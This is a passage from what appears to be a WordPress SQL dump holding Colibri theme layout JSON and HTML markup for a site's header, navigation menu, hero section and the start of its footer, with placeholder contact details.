more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/?page_id=126\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":864,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h29\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h33\",\"parentId\":\"22-h32\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h34\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','publish','closed','closed','','23','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=23',0,'extb_post_json','',0),(25,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','publish','closed','closed','','25','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_header&#038;p=25',0,'extb_post_header','',0),(26,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','publish','closed','closed','','26','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=26',0,'extb_post_json','',0),(28,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a 